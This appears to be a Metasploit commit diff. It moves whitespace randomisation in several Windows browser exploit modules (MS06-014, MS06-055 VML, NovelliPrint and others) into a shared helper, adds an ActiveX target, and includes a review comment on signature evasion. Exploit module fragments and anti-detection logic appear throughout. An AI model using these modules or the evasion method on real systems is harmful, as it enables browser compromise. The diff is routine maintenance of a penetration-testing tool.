randomize_space
git-svn-id: file:///home/svn/framework3/trunk@5496 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
297e4f4b4d
commit
faa5f7c967
|
@ -146,6 +146,7 @@ include Exploit::Remote::HttpServer::HTML
|
|||
# Automatic browser and OS detection
|
||||
#
|
||||
|
||||
print_status("Attempting to exploit ani_loadimage_chunksize")
|
||||
browser = ''
|
||||
|
||||
if target['Method'] == 'automatic'
|
||||
|
|
|
@ -48,7 +48,9 @@ class Exploits::Windows::Browser::IE_CreateObject < Msf::Exploit::Remote
|
|||
[ 'Automatic', { } ],
|
||||
|
||||
# Patched
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
|
||||
# Found in mpack
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],
|
||||
|
||||
# Patched
|
||||
[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],
|
||||
|
@ -58,24 +60,24 @@ class Exploits::Windows::Browser::IE_CreateObject < Msf::Exploit::Remote
|
|||
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],
|
||||
|
||||
# Visual Studio components, not marked as safe
|
||||
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
|
||||
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
|
||||
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
|
||||
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
|
||||
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
|
||||
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
|
||||
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
|
||||
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
|
||||
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
|
||||
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
|
||||
|
||||
#
|
||||
# The controls below can launch the "installing component" dialogs...
|
||||
#
|
||||
|
||||
# Not marked as safe
|
||||
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
|
||||
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
|
||||
|
||||
# Not marked as safe
|
||||
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
|
||||
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
|
||||
|
||||
# Found exploitable in the wild (no details)
|
||||
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
|
||||
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
|
||||
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
|
@ -218,19 +220,7 @@ function #{var_func_exploit}( ) {
|
|||
^
|
||||
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
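Review bot: `Rex::Text.randomize_space` is not defined in any hunk on this page, so the call added in the last hunk of the IE_CreateObject section cannot be checked against the inline loop it replaces; that loop rewrote every `\s+` run as 2 to 101 characters drawn from tab, space, CR and LF. The removed code also changed `content` in place with `gsub!`, while the new line rebinds the variable, so any other reference to the original string (none is visible in the hunk) would keep the unrandomized text. Assuming the helper keeps the old behaviour, I would put a one-line comment above the call, for example `# Each whitespace run becomes a random-length run, so the document bytes differ on every response`, which also tells anyone writing detection for this page to normalise whitespace before matching. The same replacement is made in the IE_IsComponentInstalled, Kazaa_Altnet_Heap, MS06_013_CreateTextRange, MS06_055_VML_Overflow, MS06_057_WebView_SetSlice, MS06_071_XML_CORE and NovelliPrint_ExecuteRequest sections below, and the enclosing method starts and ends outside each hunk.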
|
|
|
@ -86,19 +86,8 @@ class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
|
|||
</html >
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
# Insert the shellcode
|
||||
content.gsub!('__pattern__', pattern)
|
||||
|
||||
|
|
|
@ -102,18 +102,7 @@ class Exploits::Windows::Browser::Kazaa_Altnet_Heap < Msf::Exploit::Remote
|
|||
"</script>\n" +
|
||||
"</html>"
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
buf
|
||||
|
||||
end
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
@ -154,18 +154,7 @@ class Exploits::Windows::Browser::MS06_013_CreateTextRange < Msf::Exploit::Remot
|
|||
</html >
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
@ -122,19 +122,7 @@ class Exploits::Windows::Browser::MS06_055_VML_Overflow < Msf::Exploit::Remote
|
|||
</html>
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
@ -113,19 +113,8 @@ class Exploits::Windows::Browser::MS06_057_WebView_SetSlice < Msf::Exploit::Remo
|
|||
</html>
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the response to the client
|
||||
|
|
|
@ -127,18 +127,7 @@ class Exploits::Windows::Browser::MS06_071_XML_CORE < Msf::Exploit::Remote
|
|||
</html>
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
@ -105,18 +105,8 @@ class Exploits::Windows::Browser::NovelliPrint_ExecuteRequest < Msf::Exploit::Re
|
|||
</html>
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
buf
|
||||
end
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the response to the client
|
||||
|
|